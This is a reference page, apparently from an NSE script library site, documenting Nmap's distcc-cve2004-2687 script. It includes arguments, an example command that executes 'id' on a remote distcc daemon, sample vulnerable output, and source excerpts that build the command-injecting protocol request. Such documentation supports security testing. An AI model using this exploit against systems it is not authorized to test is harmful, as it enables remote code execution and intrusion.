Nmap distcc-cve2004-2687 NSE Script
This page contains detailed information about how to use the distcc-cve2004-2687 NSE script. For list of all NSE scripts, visit the Nmap NSE Library.
| Select: |
|---|
Script Overview
Script source code: https://github.com/nmap/nmap/tree/master/scripts/distcc-cve2004-2687.nse
Script categories: exploit, intrusive, vuln
Target service / protocol: distcc
Target network port(s): 3632
List of CVEs: CVE-2004-2687
Script Description
The distcc-cve2004-2687.nse script detects and exploits a remote code execution vulnerability in the distributed compiler daemon distcc. The vulnerability was disclosed in 2002, but is still present in modern implementation due to poor configuration of the service.
Distcc-cve2004-2687 NSE Script Arguments
This is a full list of arguments supported by the distcc-cve2004-2687.nse script:
cmdThe command to run at the remote server
vulns.shortIf set, vulnerabilities will be output in short format, a single line consisting of the host's target name or IP, the state, and either the CVE ID or the title of the vulnerability. Does not affect XML output.
vulns.showall
If set, the library will show and report all the registered vulnerabilities which includes the NOT VULNERABLE ones. By default the library will only report the VULNERABLE entries: VULNERABLE, LIKELY VULNERABLE, VULNERABLE (DoS) and VULNERABLE (Exploitable). This argument affects the following functions: vulns.Report.make_output(): the default output function for portule/hostrule scripts. vulns.make_output(): the default output function for postrule scripts. vulns.format_vuln() and vulns.format_vuln_table() functions.
- - -
To use these script arguments, add them to the Nmap command line using the --script-args arg1=value,[arg2=value,..] syntax. For example:
nmap --script=distcc-cve2004-2687 --script-args cmd=value,vulns.short=value <target>Distcc-cve2004-2687 NSE Script Example Usage
Here's an example of how to use the distcc-cve2004-2687.nse script:
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
Distcc-cve2004-2687 NSE Script Example Output
Here's a sample output from the distcc-cve2004-2687.nse script:
PORT STATE SERVICE
3632/tcp open distccd
| distcc-exec:
| VULNERABLE:
| distcc Daemon Command Execution
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2004-2687
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Description:
| Allows executing of arbitrary commands on systems running distccd 3.1 and
| earlier. The vulnerability is the consequence of weak service configuration.
|
| Disclosure date: 2002-02-01
| Extra information:
|
| uid=118(distccd) gid=65534(nogroup) groups=65534(nogroup)
|
| References:
| https://distcc.github.io/security.html
| https://nvd.nist.gov/vuln/detail/CVE-2004-2687
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
Distcc-cve2004-2687 NSE Script Example XML Output
There is no sample XML output for this module. However, by providing the -oX <file> option, Nmap will produce a XML output and save it in the file.xml file.
Author
- Patrik Karlsson
References
- https://nmap.org/nsedoc/scripts/distcc-cve2004-2687.html
- https://github.com/nmap/nmap/tree/master/scripts/distcc-cve2004-2687.nse
- https://distcc.github.io/security.html
- https://nvd.nist.gov/vuln/detail/CVE-2004-2687
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
See Also
Visit Nmap NSE Library for more scripts.
The distcc-cve2004-2687.nse script may fail with the following error messages. Check for the possible causes by using the code snippets highlighted below found in the script source code. This can often times help in identifying the root cause of the problem.
Failed to connect to distcc server
Here is a relevant code snippet related to the "Failed to connect to distcc server" error message:
75: local report = vulns.Report:new(SCRIPT_NAME, host, port)
76: distcc_vuln.state = vulns.STATE.NOT_VULN
77:
78: local socket = nmap.new_socket()
79: if ( not(socket:connect(host, port)) ) then
80: return fail("Failed to connect to distcc server")
81: end
82:
83: local cmds = {
84: "DIST00000001",
85: ("ARGC00000008ARGV00000002shARGV00000002-cARGV%08.8xsh -c " ..
Failed to send data to distcc server
Here is a relevant code snippet related to the "Failed to send data to distcc server" error message:
88: "DOTI00000001A\n",
89: }
90:
91: for _, cmd in ipairs(cmds) do
92: if ( not(socket:send(cmd)) ) then
93: return fail("Failed to send data to distcc server")
94: end
95: end
96:
97: -- Command could have lots of output, need to cut it off somewhere. 4096 should be enough.
98: local status, data = socket:receive_buf(match.pattern_limit("DOTO00000000", 4096), false)
Version
This page has been created based on Nmap version 7.92.
Go back to menu.
